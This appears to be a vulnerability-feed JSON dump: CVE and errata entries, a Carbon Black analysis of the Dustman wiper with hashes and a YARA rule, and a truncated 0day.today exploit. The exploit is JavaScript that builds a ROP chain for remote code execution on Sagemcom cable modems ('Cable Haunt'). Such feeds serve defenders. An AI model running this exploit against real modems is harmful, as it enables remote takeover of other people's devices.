{"id": "SECURITYVULNS:VULN:624", "bulletinFamily": "software", "title": "DoS \u043f\u0440\u043e\u0442\u0438\u0432 Windows 95/98/ME - NetBIOS driver", "description": "\u041f\u0440\u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u0430 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u043f\u043e netBIOS \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0439 \u043e\u0442\u0432\u0435\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u043a\u0440\u0430\u0445\u0443 \u041e\u0421.", "published": "2000-10-16T00:00:00", "modified": "2000-10-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:624", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:786"], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:09:15", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "5b5ee0ea86e2c3877a6adc0d623cf092"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d6852ef107774dc1d1d62ec3463cddbc"}, {"key": "href", "hash": "80886f196d9b9e49579f1b63ca2ff7bf"}, {"key": "modified", "hash": "a42ac6ee77cf18f799d9db86c996d7bf"}, {"key": "published", "hash": "a42ac6ee77cf18f799d9db86c996d7bf"}, {"key": "references", "hash": "bd66c1b04070ecabb0a7ec5e78d89cad"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "7160835e2300ef9556460b5b68367846"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "ec5c8a9e6d06e5c655ef6c3706bccd54bf070307c576a472a1bc78f9f08358b0", "viewCount": 0, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2018-08-31T11:09:15"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-32825", "1337DAY-ID-32767", "1337DAY-ID-32728", "1337DAY-ID-32726", "1337DAY-ID-32721", "1337DAY-ID-32675", "1337DAY-ID-32678", "1337DAY-ID-32672"]}, {"type": "thn", "idList": ["THN:2A7DE929E5909B366E6F490ABBF0A6C1"]}, {"type": "threatpost", "idList": ["THREATPOST:720727931BBA026660C91151A9F50C2F"]}, {"type": "ubuntu", "idList": ["USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152997"]}, {"type": "kitploit", "idList": ["KITPLOIT:3928947731225997712"]}, {"type": "zeroscience", "idList": ["ZSL-2019-5518"]}], "modified": "2018-08-31T11:09:15"}, "vulnersScore": 2.9}, "objectVersion": "1.3", "affectedSoftware": [{"name": "Windows", "operator": "eq", "version": "95"}, {"name": "Windows", "operator": "eq", "version": "98"}]}

{"oraclelinux": [{"lastseen": "2020-01-22T20:26:40", "bulletinFamily": "unix", "description": "[1.8.3-15]\n- Fix CVE-2014-0114\n- Fix CVE-2019-10086", "modified": "2020-01-22T00:00:00", "published": "2020-01-22T00:00:00", "id": "ELSA-2020-0194", "href": "http://linux.oracle.com/errata/ELSA-2020-0194.html", "title": "apache-commons-beanutils security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "carbonblack": [{"lastseen": "2020-01-21T19:27:15", "bulletinFamily": "blog", "description": "Several different events in the Middle East (ME) region have escalated in the last several weeks between Iran and the United States. After a series of military operations between the two countries, several alerts were released from the U.S. government of a potential for cyberattacks. \n\nTraditionally there have been several high profile threat groups that have been suspected to have been backed by or acted on behalf of Iran. Using the below image as a high level timeline we can see these Iranian threat groups have been active in cyber attacks for a considerable amount of time. The recent tensions in the ME region have brought this threat to the forefront in the news. While the threat and capabilities of groups supporting Iran are very real, they have not just become active with the activity that has occurred recently. From public reporting and internal research, many of these groups rely heavily on common tactics like spear phishing, brute force attacks, and internet facing systems with unpatched known vulnerabilities. \n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/01/Figure1.png>) \n\n\n_Figure 1: Iranian Threat Group Timeline Overview_\n\nIn the past week ,reports have surfaced of different attacks, where destructive malware have been used against victims in the Middle East. Destructive malware is generally the coup de gr\u00e2ce, that follows a larger attack. From talking to IR partners in the region and from other published reports, this specific destructive malware has been used in conjunction with traditional lateral movement techniques. Detecting and stopping the first stages of these types of attacks should continue to be the principal fundamentals that security practitioners refine in their organizations. Focusing on spear phishing, user execution, credential dumping, and living off the land techniques will yield positive security returns that will help to combat numerous threat groups.\n\nAs a result of the recent increase in news coverage we would like to share a detailed analysis of common activity seen from Iranian threat actors, who have utilized this wiper. Additionally, numerous customers and partners requested that we provide product specific detections. \n\nThe malware itself is a variant of a kernel driver loader, used extensively by the Turla group (Russian APT) as early as 2014. The initial binary will create three files on the local system, which are embedded and encoded as resources. The dropper will then create a service to run one of the files which is a legitimate VirtualBox driver file. \n\nThis specific version is signed, but contains a known vulnerability (CVE-2008-3431) that allows the dropper to inject shellcode into the process, which will execute and load an unsigned driver which bypasses Microsoft's driver signature execution protections. This unsigned driver is a legitimate application that provides low level access to the disk and file system. The third file, which is the wiper, uses the raw disk driver to write junk data to different regions of the disk making the operating system crash and become unresponsive. \n\nAdditionally some data originally present on the disk will be unrecoverable. The image below is an overview of how the files are dropped on the disk, and interact with each other as part of this attack. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/01/Figure2.png>) \n\n\n_Figure 2: Overview of Wiper attack flow_\n\n# Technical Details:\n\nThe following file was analyzed for this report.\n\nFile Name : f07b0c79a8c88a5760847226af277cf34ab5508394a58820db4db5a8d0340fc7\n\nFile Size : 264,704 bytes\n\nMD5 : 8afa8a59eebf43ef223be52e08fcdc67\n\nSHA256 : f07b0c79a8c88a5760847226af277cf34ab5508394a58820db4db5a8d0340fc7\n\nFuzzy : 6144:h2+Z0A0chhA+AosUTvc2Y8Y7wyjo7m9nnnhNS:h2U0chhA7fUTE2Y8Y7LjJU\n\nCompiled Time : Sun Dec 29 05:57:19 2019 UTC\n\nPE Sections (6) : Name Size MD5\n\n.text 23,040 66d7ac544a1f5b491352ad4f7e4cf031\n\n.rdata 25,600 23eae969fe24828290656fe68826341c\n\n.data 2,048 06cf554c8ba8c65b8a683ec9a0325251\n\n.pdata 1,536 a4dc3a86ed1f2519242079767e6697c2\n\n.rsrc 209,920 873a1305f4c1378dada4c66a8d0c2ee1\n\n.reloc 1,536 f5545886ab6e4a1562a985fb37b66e8b \n \n--- \n \n_Table 1: Wiper metadata_\n\nThis file is a variant of a Turla driver loader. The loader will initially create the mutex \u201cDown With Bin Salman,\u201d an obvious reference to Crown Prince Mohammad Bin Salman and the regions being targeted. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/01/Figure3.png>) \n\n\n_Figure 3: Mutex creation_\n\nThe dropper will then determine the version number of the operating system, highlighted in red in the image below. If the operating system is 6.x or above (which correlates to Windows Vista or newer), it will then create the two initial files on the system. This activity is highlighted in blue below. It should be noted that all of the embedded files are stored in the binary as resources, which have been encoded using a one byte XOR key of 0x70. The first file which is written to disk is the raw disk driver, which is decoded and created in the same directory that the dropper is running out of (highlighted in blue). This file will be saved to disk as elrawdsk.sys. If this file creation operation is successful then the binary will begin creating the second file, which is a legitimate VirtualBox driver, highlighted in green below.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/01/Figure4.png>) \n\n\n_Figure 4: RawDisk driver creation_\n\nThe dropper will then decode the second payload, highlighted in red in the image below. The dropper will then use API calls to query the service manager to stop several VirtualBox related services, which is highlighted in green in Figure 5. This is done specifically using the ControlService API with the _SERVICE_CONTROL_STOP_ parameter. The decoded payload is then written to disk as assistant.sys, in the same directory that the loader is running from. The loader will then create a new service, named VBoxDrv (highlighted in blue). \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/01/Figure5.png>) \n\n\n_Figure 5: VBox Driver Creation_\n\nThe file, assistant.sys, is a VirtualBox (vbox) driver that has a known vulnerability which ultimately allows an attacker to execute a shellcode payload under the context of the vbox driver. The shellcode is embedded in the loader itself and injected, via the exploit, into the now running vbox driver. The shellcode will then load the elrawdsk.sys file, highlighted in red below. The technique of passing shellcode to this vulnerable driver has been well documented publicly in 2014.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/01/Figure6.png>) \n\n\n_Figure 6: Shellcode_\n\nThe dropper will then decode the final payload, highlighted in red in the image below. The file will be saved to disk as agent.exe, in the same directory from which the loader is running. This file is the executable that performs the wiping of the drive, leveraging the raw disk driver. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/01/Figure7.png>) \n\n\n_Figure 7: VBox Driver Creation_\n\nThe dropper will then enumerate the drives on the local system, and check that the drive types are either _fixed_ or _removable_, highlighted in blue. For any drive that matches those types, the loader will create a process, using cmd.exe to execute the agent.exe file with the drive letter passed as an argument. For example, if targeting the C: drive the agent.exe file would be executed in the following manner.\n\ncmd.exe /c agent.exe C \n \n--- \n \n_Table 2: Wiper process creation command_\n\nThe metadata for the payloads that the loaded extracts and writes to disk are listed in the table below.\n\nFile Name : RCData103_decoded_elrawdsk_sys\n\nFile Size : 24,576 bytes\n\nMD5 : 993e9cb95301126debdea7dd66b9e121\n\nSHA256 : 36a4e35abf2217887e97041e3e0b17483aa4d2c1aee6feadd48ef448bf1b9e6c\n\nFuzzy : 384:9a5MM0mSc80J0sES5EGr7Btpqu1Ehc+PGhzgWdSLSbf/V+23HzirUJ2R8mf:9i3SAHOoz1a2clLST/zzixl\n\nCompiled Time : Sun Oct 14 07:43:19 2012 UTC\n\nPE Sections (8) : Name Size MD5\n\n.text 2,048 f1586570bc3b13cf44177ed0aa450ce1\n\n.rdata 2,048 ffb0f65059aa7db9f0c55362613de63b\n\n.data 1,024 bce690b9958a1f2608e76792d965e7da\n\n.pdata 512 39f4bdfd2585aae5f0f98dd1f2e03e9e\n\nPAGE 12,800 268e57650e52bf91d5a3d220655e60b2\n\nINIT 3,072 29d48a7744e57dad07324620f56af2a1\n\n.rsrc 1,536 43a539179fa3f6a3f6ffcb2c57bf1d95\n\n.reloc 512 0093f3067e3ee05090f18848d48ea070 \n \n--- \n \nFile Name : RCData1_decoded_assistant_sys\n\nFile Size : 68,288 bytes\n\nMD5 : eaea9ccb40c82af8f3867cd0f4dd5e9d\n\nSHA256 : cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986\n\nFuzzy : 768:mkD7TfQS7D8ueMKxp0pO/Qw+FKebe3vFQFftSJfghVotiTAlLwJidG:33d38uezp0Dw+49tKMgVxAlIiw\n\nCompiled Time : Sat May 31 02:18:53 2008 UTC\n\nPE Sections (7) : Name Size MD5\n\n.text 34,176 4b04940d26665267e42db88ec868cdd9\n\n.rdata 10,848 433d6fb8c2f3f28c4aea135fcf971e3e\n\n.data 7,424 e180c606e433e1d25937e9a76c57467d\n\n.pdata 3,328 3f62eff4073fe0d75533511bd0b09980\n\n.edata 2,688 64c8958a650b57653700faba6d8498a5\n\nINIT 1,600 e4dc926ea30b0bf7ef2cb442d7f3a32c\n\n.reloc 320 7f7f212d17b850c84af7280334af4ac5\n\n\\+ 0xef00 7,104 053496d7aaf38e7254168c45db174a73 (Authenticode Signature) \n \nFile Name : RCData106_decoded_agent_exe\n\nFile Size : 116,224 bytes\n\nMD5 : f5f8160fe8468a77b6a495155c3dacea\n\nSHA256 : 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2\n\nFuzzy : 3072:VKMMWFhWGRGhZIzPic5RbQ9b4R1DcMxaiJe:AMZh1kUPiMMKR1DTJ\n\nCompiled Time : Sun Dec 29 05:56:27 2019 UTC\n\nPE Sections (6) : Name Size MD5\n\n.text 65,024 d4295afb97256d94ae19e986f0ad6241\n\n.rdata 39,936 50bb7471927210d3d8e34922f6847150\n\n.data 3,072 4c592fa4e1d48f89277f80aa010b8c6c\n\n.pdata 4,608 d457546482af93105ce2717a0422c9f1\n\n.rsrc 512 29412b566252e86f11d2b70244750eb8\n\n.reloc 2,048 f546ac3a4cceb621af2318eb7e2be625 \n \n_Table 3: Dropped files\u2019 metadata_\n\nThe wiper itself ultimately leverages the loaded raw disk driver (elrawdsk.sys) to overwrite junk code to the MBR and other areas of the hard drive. The image below shows the basic setup, where the wiper will open a handle to the logical drive via the driver. The license key that is visible has been referenced in previous analysis as well. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/01/Figure8.png>) \n\n\n_Figure 8: Agent wiper functionality_\n\n## For VMware Carbon Black product detections, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/ZeroCleare-Dustman-Wiper/ta-p/84911>)\n\n## Yara Rule\n\nrule apt34_2020_Q1_Dustman : TAU IR wiper TDL\n\n{\n\nmeta:\n\nauthor = \"CarbonBlack Threat Research\" //JMyers\n\ndate = \"2020-Jan-2\"\n\ndescription = \"TDL dropper related to Dustman Wiper\"\n\njira = \"TR-4118\"\n\nrule_version = 1\n\nyara_version = \"3.11.0\"\n\nexemplar_hashes = \"f07b0c79a8c88a5760847226af277cf34ab5508394a58820db4db5a8d0340fc7\"\n\nstrings:\n\n$s1 = \"VBoxDrv\" wide\n\n$s2 = \"VBoxUSBMon\" wide \n\n$s3 = \"VBoxNetAdp\" wide\n\n$s4 = \"VBoxNetLwf\" wide\n\n$s5 = \"Software\\\\\\Oracle\\\\\\VirtualBox\" wide\n\n$s6 = \"elrawdsk.sys\" wide\n\n$b1 = {3D B7 00 00 00} //compare error code\n\n$b2 = {49 B9 70 70 70 70 70 70 70 70} //more XOR key\n\n$b3 = {48 8B C4 41 54 48 81 EC 90} //shell code\n\n$MZ = {3D 2A E0 70 73} //encoded MZ\n\ncondition:\n\n4 of ($s*)\n\nand 2 of ($b*)\n\nand #MZ &gt; 2\n\n} \n \n--- \n \n \n\nThe post [Threat Analysis Unit (TAU) Technical Report: The Prospect of Iranian Cyber Retaliation](<https://www.carbonblack.com/2020/01/21/threat-analysis-unit-tau-technical-report-the-prospect-of-iranian-cyber-retaliation/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "modified": "2020-01-21T18:41:46", "published": "2020-01-21T18:41:46", "id": "CARBONBLACK:0F81EEE14B0DCAB7480ED2FA549B6E8E", "href": "https://www.carbonblack.com/2020/01/21/threat-analysis-unit-tau-technical-report-the-prospect-of-iranian-cyber-retaliation/", "type": "carbonblack", "title": "Threat Analysis Unit (TAU) Technical Report: The Prospect of Iranian Cyber Retaliation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-01-22T14:14:16", "bulletinFamily": "NVD", "description": "Prizm Content Connect 5.1 has an Arbitrary File Upload Vulnerability", "modified": "2020-01-21T16:33:00", "id": "CVE-2012-5190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5190", "published": "2020-01-21T16:15:00", "title": "CVE-2012-5190", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-16T13:14:48", "bulletinFamily": "NVD", "description": "AR System Mid Tier in the AR System Mid Tier component before 9.0 SP1 for BMC Remedy AR System Server allows remote authenticated users to \"navigate\" to arbitrary files via the __report parameter of the BIRT viewer servlet.", "modified": "2020-01-15T18:43:00", "id": "CVE-2015-5071", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5071", "published": "2020-01-15T18:15:00", "title": "CVE-2015-5071", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-16T13:14:48", "bulletinFamily": "NVD", "description": "The BIRT Engine servlet in the AR System Mid Tier component before 9.0 SP1 for BMC Remedy AR System Server allows remote authenticated users to \"navigate\" to arbitrary local files via the __imageid parameter.", "modified": "2020-01-15T18:43:00", "id": "CVE-2015-5072", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5072", "published": "2020-01-15T18:15:00", "title": "CVE-2015-5072", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-16T13:14:50", "bulletinFamily": "NVD", "description": "The create function in app/code/core/Mage/Catalog/Model/Product/Api/V2.php in Magento Community Edition (CE) before 1.9.2.1 and Enterprise Edition (EE) before 1.14.2.1, when used with PHP before 5.4.24 or 5.5.8, allows remote authenticated users to execute arbitrary PHP code via the productData parameter to index.php/api/v2_soap.", "modified": "2020-01-15T18:44:00", "id": "CVE-2015-6497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6497", "published": "2020-01-15T17:15:00", "title": "CVE-2015-6497", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-18T12:46:57", "bulletinFamily": "NVD", "description": "The DNS packet parsing/generation code in PowerDNS (aka pdns) Authoritative Server 3.4.x before 3.4.6 allows remote attackers to cause a denial of service (crash) via crafted query packets.", "modified": "2020-01-17T21:28:00", "id": "CVE-2015-5230", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5230", "published": "2020-01-15T17:15:00", "title": "CVE-2015-5230", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-15T14:14:29", "bulletinFamily": "NVD", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was intended functionality. Notes: none.", "modified": "2020-01-14T18:15:00", "id": "CVE-2015-4107", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4107", "published": "2020-01-14T18:15:00", "title": "CVE-2015-4107", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-15T14:14:26", "bulletinFamily": "NVD", "description": "The compile_branch function in PCRE before 8.37 allows context-dependent attackers to compile incorrect code, cause a denial of service (out-of-bounds heap read and crash), or possibly have other unspecified impact via a regular expression with a group containing a forward reference repeated a large number of times within a repeated outer group that has a zero minimum quantifier.", "modified": "2020-01-14T17:17:00", "id": "CVE-2015-2325", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2325", "published": "2020-01-14T17:15:00", "title": "CVE-2015-2325", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-22T14:23:37", "bulletinFamily": "NVD", "description": "BSD mailx 8.1.2 and earlier allows remote attackers to execute arbitrary commands via a crafted email address.", "modified": "2020-01-21T16:05:00", "id": "CVE-2014-7844", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7844", "published": "2020-01-14T17:15:00", "title": "CVE-2014-7844", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-15T14:14:26", "bulletinFamily": "NVD", "description": "The pcre_compile2 function in PCRE before 8.37 allows context-dependent attackers to compile incorrect code and cause a denial of service (out-of-bounds read) via regular expression with a group containing both a forward referencing subroutine call and a recursive back reference, as demonstrated by \"((?+1)(\\1))/\".", "modified": "2020-01-14T17:17:00", "id": "CVE-2015-2326", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2326", "published": "2020-01-14T17:15:00", "title": "CVE-2015-2326", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-22T14:23:34", "bulletinFamily": "NVD", "description": "Integer overflow in the get_len function in libavutil/lzo.c in Libav before 0.8.13, 9.x before 9.14, and 10.x before 10.2 allows remote attackers to execute arbitrary code via a crafted Literal Run.", "modified": "2020-01-21T16:49:00", "id": "CVE-2014-4609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4609", "published": "2020-01-14T16:15:00", "title": "CVE-2014-4609", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-01-19T23:05:54", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2020-01-15T00:00:00", "published": "2020-01-15T00:00:00", "id": "1337DAY-ID-33818", "href": "https://0day.today/exploit/description/33818", "title": "Sagemcom [email\u00a0protected] 3890 (50_10_19-T1) Cable Modem - Cable Haunt Remote Code Execution Exploit", "type": "zdt", "sourceData": "// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47936.zip\r\n\r\nfunction buf2hex(buffer) { // buffer is an ArrayBuffer\r\n return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join('');\r\n}\r\n\r\nfunction insertAt(arr, index, toInsert) {\r\n for(let i = 0; i < toInsert.length; i++) {\r\n arr[i+index]= toInsert[i];\r\n }\r\n}\r\n\r\nfunction testEqual(buf1, buf2)\r\n{\r\n if (buf1.byteLength != buf2.byteLength) return false;\r\n var dv1 = new Int8Array(buf1);\r\n var dv2 = new Int8Array(buf2);\r\n for (var i = 0 ; i != buf1.byteLength ; i++)\r\n {\r\n if (dv1[i] != dv2[i]) return false;\r\n }\r\n return true;\r\n}\r\n\r\narr = new Uint8Array(0xd00);\r\n\r\narr.fill(0x41)\r\n\r\nfirstSp = 0x00\r\npreviousSp = firstSp\r\nsp = previousSp+0xa0\r\ninsertAt(arr, previousSp+0x84-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])\r\ninsertAt(arr, previousSp+0x94-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) \r\n// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x20\r\ninsertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) \r\n//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) \r\n//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp-1, [0xf2, 0x80, 0x8a, 0x89, 0x7c])\r\ninsertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])\r\n//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; \r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])\r\n//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x30\r\ninsertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])\r\n//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n//call Socket\r\n\r\n//0x80a05b20\r\nsocketAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x20]\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, socketAddr) //set s0 = socketAddr\r\ninsertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])\r\n//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;\r\n\r\n//0x80a05a30;\r\nserverAddr = [0xe2, 0x80, 0xa0, 0x5a, 0x30];\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x20\r\ninsertAt(arr, sp-1, serverAddr) //set s0 = serverAddr\r\ninsertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp + 0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x48, 0x71, 0x6c])\r\n//0x8048716c: move $a0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp + 0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x87, 0x9e, 0x68])\r\n//0x80879e68: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp + 0x10\r\ninsertAt(arr, previousSp-1, [0xe2, 0x80, 0x83, 0xd9, 0xb8])\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])\r\n//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])\r\n//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; \r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])\r\n//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])\r\n//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n//call memset\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp, [0x41, 0x2, 0x5, 0x39]) //set s0 = port\r\ninsertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\n// previousSp = sp\r\n// sp = previousSp+0x10\r\n// insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])\r\n// //0x80787f64: jalr $s5; nop;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])\r\n//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; \r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, serverAddr) //set s0 = serverAddr\r\ninsertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, sp-1, socketAddr)\r\ninsertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])\r\n//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;\r\n//store port\r\n\r\n// previousSp = sp\r\n// sp = previousSp+0x20\r\n// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])\r\n// //0x80787f64: jalr $s5; nop;\r\n\r\nsocketAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x1c]\r\n\r\npreviousSp = 